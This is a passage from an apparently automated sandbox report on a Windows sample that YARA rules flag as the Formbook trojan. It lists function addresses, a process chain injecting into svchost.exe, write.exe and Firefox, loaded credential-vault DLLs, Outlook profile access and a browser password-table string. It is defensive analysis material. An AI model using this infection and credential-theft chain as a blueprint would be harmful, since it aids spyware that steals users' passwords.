            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeCode function: 5_2_02840D5D5_2_02840D5D
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeCode function: 5_2_02842B0D5_2_02842B0D
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeCode function: 5_2_02842B095_2_02842B09
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeCode function: 5_2_0286181D5_2_0286181D
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeCode function: 5_2_0284943D5_2_0284943D
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeCode function: 5_2_028494385_2_02849438
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeCode function: 5_2_02840DA45_2_02840DA4
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeCode function: 5_2_02840DAD5_2_02840DAD
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeCode function: 5_2_02842D2D5_2_02842D2D
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045424466_2_04542446
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045344206_2_04534420
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0453E4F66_2_0453E4F6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044905356_2_04490535
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045505916_2_04550591
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044AC6E06_2_044AC6E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044B47506_2_044B4750
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044907706_2_04490770
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0448C7C06_2_0448C7C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045220006_2_04522000
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045181586_2_04518158
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044801006_2_04480100
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0452A1186_2_0452A118
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045481CC6_2_045481CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045441A26_2_045441A2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045501AA6_2_045501AA
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045302746_2_04530274
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045102C06_2_045102C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454A3526_2_0454A352
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045503E66_2_045503E6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0449E3F06_2_0449E3F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04490C006_2_04490C00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04480CF26_2_04480CF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04530CB56_2_04530CB5
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0449AD006_2_0449AD00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0452CD1F6_2_0452CD1F
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0448ADE06_2_0448ADE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044A8DBF6_2_044A8DBF
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04490E596_2_04490E59
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454EE266_2_0454EE26
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454EEDB6_2_0454EEDB
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454CE936_2_0454CE93
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044A2E906_2_044A2E90
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04504F406_2_04504F40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04532F306_2_04532F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044D2F286_2_044D2F28
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044B0F306_2_044B0F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04482FC86_2_04482FC8
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0450EFA06_2_0450EFA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0449A8406_2_0449A840
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044928406_2_04492840
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044BE8F06_2_044BE8F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044768B86_2_044768B8
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044A69626_2_044A6962
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044929A06_2_044929A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0455A9A66_2_0455A9A6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0448EA806_2_0448EA80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454AB406_2_0454AB40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04546BD76_2_04546BD7
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044814606_2_04481460
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454F43F6_2_0454F43F
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045475716_2_04547571
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0452D5B06_2_0452D5B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044D56306_2_044D5630
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045416CC6_2_045416CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454F7B06_2_0454F7B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044970C06_2_044970C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0453F0CC6_2_0453F0CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454F0E06_2_0454F0E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045470E96_2_045470E9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044C516C6_2_044C516C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0447F1726_2_0447F172
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0455B16B6_2_0455B16B
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0449B1B06_2_0449B1B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044AB2C06_2_044AB2C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044AD2F06_2_044AD2F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045312ED6_2_045312ED
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044952A06_2_044952A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0447D34C6_2_0447D34C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454132D6_2_0454132D
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044D739A6_2_044D739A
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04509C326_2_04509C32
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454FCF26_2_0454FCF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04493D406_2_04493D40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04541D5A6_2_04541D5A
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04547D736_2_04547D73
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044AFDC06_2_044AFDC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04499EB06_2_04499EB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454FF096_2_0454FF09
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04453FD56_2_04453FD5
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04453FD26_2_04453FD2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04491F926_2_04491F92
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454FFB16_2_0454FFB1
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044FD8006_2_044FD800
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044938E06_2_044938E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044999506_2_04499950
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044AB9506_2_044AB950
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045259106_2_04525910
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04547A466_2_04547A46
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454FA496_2_0454FA49
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04503A6C6_2_04503A6C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0453DAC66_2_0453DAC6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044D5AA06_2_044D5AA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04531AA36_2_04531AA3
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0452DAAC6_2_0452DAAC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454FB766_2_0454FB76
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04505BF06_2_04505BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044CDBF96_2_044CDBF9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044AFB806_2_044AFB80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001E1B806_2_001E1B80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001DCAB06_2_001DCAB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001DCAAC6_2_001DCAAC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001DCCD06_2_001DCCD0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001DAD506_2_001DAD50
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001DAD476_2_001DAD47
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001E52006_2_001E5200
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001D13A16_2_001D13A1
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001E33DB6_2_001E33DB
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001E33E06_2_001E33E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001FB7C06_2_001FB7C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041FE4B56_2_041FE4B5
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041FE3946_2_041FE394
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041FE84C6_2_041FE84C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041FD8B86_2_041FD8B8
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041FCB3D6_2_041FCB3D
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041FCB786_2_041FCB78
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 044D7E54 appears 99 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 0447B970 appears 262 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 044C5130 appears 58 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 0450F290 appears 103 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 044FEA12 appears 86 times
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: String function: 00445975 appears 65 times
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: String function: 0041171A appears 37 times
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: String function: 0041718C appears 44 times
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: String function: 0040E6D0 appears 35 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 103 times
            Source: r6lOHDg9N9.exe, 00000000.00000003.1712856043.000000000485D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs r6lOHDg9N9.exe
            Source: r6lOHDg9N9.exe, 00000000.00000003.1713194191.00000000046B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs r6lOHDg9N9.exe
            Source: r6lOHDg9N9.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@11/9
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeFile created: C:\Users\user\AppData\Local\Temp\uppishlyJump to behavior
            Source: r6lOHDg9N9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: write.exe, 00000006.00000003.2272892467.00000000028C2000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2273032680.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3551184016.00000000028E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: r6lOHDg9N9.exeReversingLabs: Detection: 65%
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeFile read: C:\Users\user\Desktop\r6lOHDg9N9.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\r6lOHDg9N9.exe "C:\Users\user\Desktop\r6lOHDg9N9.exe"
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\r6lOHDg9N9.exe"
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\r6lOHDg9N9.exe"Jump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: r6lOHDg9N9.exeStatic file information: File size 1339905 > 1048576
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000001.00000002.2093567999.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093545639.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551281257.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000001.00000002.2093567999.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093545639.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551281257.0000000000808000.00000004.00000020.00020000.00000000.sdmp
